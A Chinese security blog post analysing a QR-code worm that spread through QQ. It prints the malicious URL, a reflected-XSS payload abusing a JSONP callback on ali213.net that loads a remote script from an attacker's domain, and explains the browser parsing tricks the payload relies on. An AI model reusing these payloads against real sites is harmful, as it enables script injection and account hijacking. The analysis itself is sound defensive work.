QQ蠕虫二维码分析

本文总阅读量
  2 mins to read  

前言

前几天看到了至少两位同学因为扫描这个二维码,而后即发送二维码给所有好友,以蠕虫形式传播


解析二维码,获得网址:

http%3A%2f%2fi.ali213.net%2fapi.html%3Faction%3Dlogout%26callback%3D%00%00%00%00%00%00%00%3CscripT%2fsrc%3D%2f%2fccccccccccc.nekeda.cn%2ftemplate%2fapp.js%3E%3C%2fscripT%3E%3C%21--

URL decode得到http://i.ali213.net/api.html?action=logout&callback=%00%00%00%00%00%00<scripT/src=//ccccccccccc.nekeda.cn/template/app.js></scripT><!--

whois查询ali213.net域名,为游侠游戏网站,看来是调用了正经网站的API


访问API:http://i.ali213.net/api.html?action=logout

{
	"status":1,
	"msg":"\u767b\u51fa\u6210\u529f",
	"data":{
		"script":"<script type=\"text\/javascript\"src=\"http:\/\/game.ali213.net\/api\/uc.php?time=1534038380&code=f755W9lt6o%2BqYgP7noRqshLJkkaC%2B5tatuf93A%2BStzaG4RDk%2Bc8tvBDMQl%2BFMy60io72HumXtCjNwgVsyA\" reload=\"1\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/shop.ali213.com\/api\/uc.php?time=1534038380&code=52dbb8X%2Fn%2B1bF%2BRO8srsZBgjLnUcoQ1ZmNOsXsfx3iQAYl3HWz14r0vKPQiWJoXAqqx5FT4BvlTR35Otug\" reload=\"1\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/passport.ali213.net\/api\/uc.php?time=1534038380&code=f003M1FK18joxKRVW8wD7q06z6PLqWLHnzOpVSNEXaAqZBZS%2B4i7oMEMi1zPmHbQqhmeqELwecnjeLAkOQ\" reload=\"1\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/plugin.ali213.net\/api\/uc.php?time=1534038380&code=3358a%2FEySHeMPKTgQfm0ikkqPMDIjun4EUoy0mtcUu0%2BZAuIxOSuQGVBvpoVTq1P1D6s2JGCRLTdXak4MQ\" reload=\"1\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/i.ali213.net\/api\/uc.html?time=1534038380&code=c0ecTf31BWZivvpSCfIz2Vy9pu7aEmIf1a6FGU16c%2BrNtkvNBBFs22E%2Fbvr6CCSyX2xb7vt2ZxazvzsCSQ\" reload=\"1\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/api.ali213.net\/api\/uc.php?time=1534038380&code=6b3cTo0z9viiFnow3HTKykapqEpk%2FejYeoC5BKYRNsYtK8wh%2FlO71%2BJk0NxrugQw5W%2F2kn4VjHQdVER0tQ\" reload=\"1\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/3g.ali213.net\/aliSSO.php?action=logout&time=1534038381&signature=6095414c49fa4bad204bb189e405aebe\" reload=\"1\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/game.ali213.net\/aliSSO.php?action=logout&time=1534038381&signature=6fc3efe1ae20847e0326173dc5b7ee7c\" reload=\"1\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/zhidao.ali213.net\/aliSSO.php?action=logout&time=1534038381&signature=3a12ba4fb7d01c0e1de8ec8510265356\" reload=\"1\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/pk.im.iyouxia.com\/aliSSO.php?action=logout&time=1534038381&signature=f283a40aef2e97d83719e57ed3293ed9\" reload=\"1\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/ol.ali213.net\/aliSSO.php?action=logout&time=1534038381&signature=54fd6efba68f7aa98248b4fec552b9a2\" reload=\"1\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/comment.ali213.net\/aliSSO.php?action=logout&time=1534038381&signature=424ad74c51c8582bdf9061b23f3c4215\" reload=\"1\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/wan.ali213.net\/aliSSO.php?action=logout&time=1534038381&signature=0bc3326cd131495296a095bac06dfc3a\" reload=\"1\"><\/script>"
	}
}

得到正常的log out json数据


接着添加callback参数:

http://i.ali213.net/api.html?action=logout&callback=%3Cscript%3Ealert(0);%3C/script%3E

回调的参数改写页面代码格式为:

callback([json]{
	"xxx":"xxx",
	"xxx":"xxx"
})

所以这样的接口就相当于是一个可由攻击者写入任意js代码的页面,从而发起xss


XSS payload

<scripT/src=//ccccccccccc.nekeda.cn/template/app.js></scripT><!--

执行后的页面代码为

<scripT/src=//ccccccccccc.nekeda.cn/template/app.js></scripT><!--({"status":1,"msg":"\u767b\u51fa\u6210\u529f","data":..........
.....
  • <script/src

    • FireFox的解析器会将标签后的非字母非数字字符认为是一个空白或无效字符
    • Gecko渲染引擎允许任何字符包括字母,数字或特殊字符(例如引号,尖括号等)存在于事件名称和等号之间 ,如<body onload@#*!$=alert(0)>
  • src=//xxx.com
    • 协议解析绕过。在FireFox下无效
  • <!--
    • 注释后面的json部分,有点多余,不注释也不会影响payload代码

whois查询域名nekeda.cn的注册人:魏xx,名下有4600+域名记录

一级域名未绑定IP,二级域名解析到一个IIS 7服务器,访问蠕虫js代码,来晚了已经404了。

猜想是利用webQQ协议的CSRF,获取所有好友名单并发送二维码